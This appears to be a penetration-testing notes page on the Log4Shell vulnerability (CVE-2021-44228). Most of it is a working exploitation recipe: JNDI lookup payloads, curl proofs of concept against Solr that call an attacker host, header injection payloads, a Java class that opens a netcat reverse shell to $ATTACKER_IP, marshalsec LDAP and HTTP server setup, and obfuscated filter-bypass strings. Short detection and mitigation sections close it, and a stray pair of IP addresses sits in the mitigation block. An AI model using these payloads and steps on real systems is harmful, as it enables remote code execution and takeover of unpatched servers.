# Log4Shell * `log4j` < version 2.15.0rc2 * [CVE-2021-44228](https://www.huntress.com/blog/rapid-response-critical-rce-vulnerability-is-affecting-java) * [log4j vulnerability tester](https://log4shell.huntress.com/) * [List of exploitable services](https://github.com/YfryTchsGD/Log4jAttackSurface) * Code inside a `param` value is parsed and a `${payload}` will be executed, for example ```sh ${sys:os.name} ${sys:user.name} ${log4j:configParentLocation} ${ENV:PATH} ${ENV:HOSTNAME} ${java:version} ``` ## Java Naming and Directory Interface JNDI * Vulnerability can be exploited via `${jndi:ldap:///foo}` ## POC ```sh curl 'http://$TARGET:8983/solr/admin/cores?foo=?$\{jndi:ldap://$ATTACKER_IP:4449\}' ``` * Use HTTP header field as storage for payload or any other possible input field ```HTTP X-Forwarded-For: ${jndi:ldap://$ATTACKER_IP:1389/foo} Accept: ${jndi:ldap://$ATTACKER_IP:1389/foo} X-Api-Version: ${jndi:ldap://$ATTACKER_IP:1389/foo} ``` ## Usage * Fuzz endpoints to applicate the exploit on * Clone and build [marshallsec](https://github.com/mbechler/marshalsec) via `mvn clean package -DskipTests` * Java version should be the same as the one on the target * A Proxy LDAP server to an HTTP server is needed * Compile following Java reverse shell via `javac Exploit.java -source 8 -target 8` to Exploit.class ```sh public class Exploit { static { try { java.lang.Runtime.getRuntime().exec("nc -e /bin/bash $ATTACKER_IP 4449"); } catch (Exception e) { e.printStackTrace(); } } } ``` * Run the LDAP, HTTP and reverse shell ```sh java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://$ATTACKER_IP:8000/#Exploit" ``` ```sh php -S 0.0.0.:8000 ``` ```sh nc -lvnp 4449 ``` * Trigger via `curl 'http://$TARGET:8983/solr/admin/cores?foo=$\{jndi:ldap://$ATTACKER_IP:1389/Exploit\}'` ## Detection * [Log4Shell-Hashes](https://github.com/mubix/CVE-2021-44228-Log4Shell-Hashes.git) * [Vulnerable Class + Jar hashes](https://github.com/nccgroup/Cyber-Defence/tree/master/Intelligence/CVE-2021-44228) * [reddit mega thread](https://www.reddit.com/r/sysadmin/comments/reqc6f/log4j_0day_being_exploited_mega_thread_overview/) * [Yara rules](https://github.com/darkarnium/CVE-2021-44228) * Parse logs for `jndi` ## Obfuscation * Possible bypasses are as follows ```sh ${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}${env:ENV_NAME:-l}dap${env:ENV_NAME:-:}//attackerendpoint.com/} ${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://attackerendpoint.com/} ${${upper:j}ndi:${upper:l}${upper:d}a${lower:p}://attackerendpoint.com/} ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://attackerendpoint.com/z} ${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//attackerendpoint.com/} ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://attackerendpoint.com/} ${${::-j}ndi:rmi://attackerendpoint.com/} ``` ## Mitgation * [Apache Solr security news](https://solr.apache.org/security.html) * Add the following line to `solr.in.sh` ```toml SOLR_OPTS="$SOLR_OPTS -Dlog4j2.formatMsgNoLookups=true" 10.10.90.21210.10.90.212 ```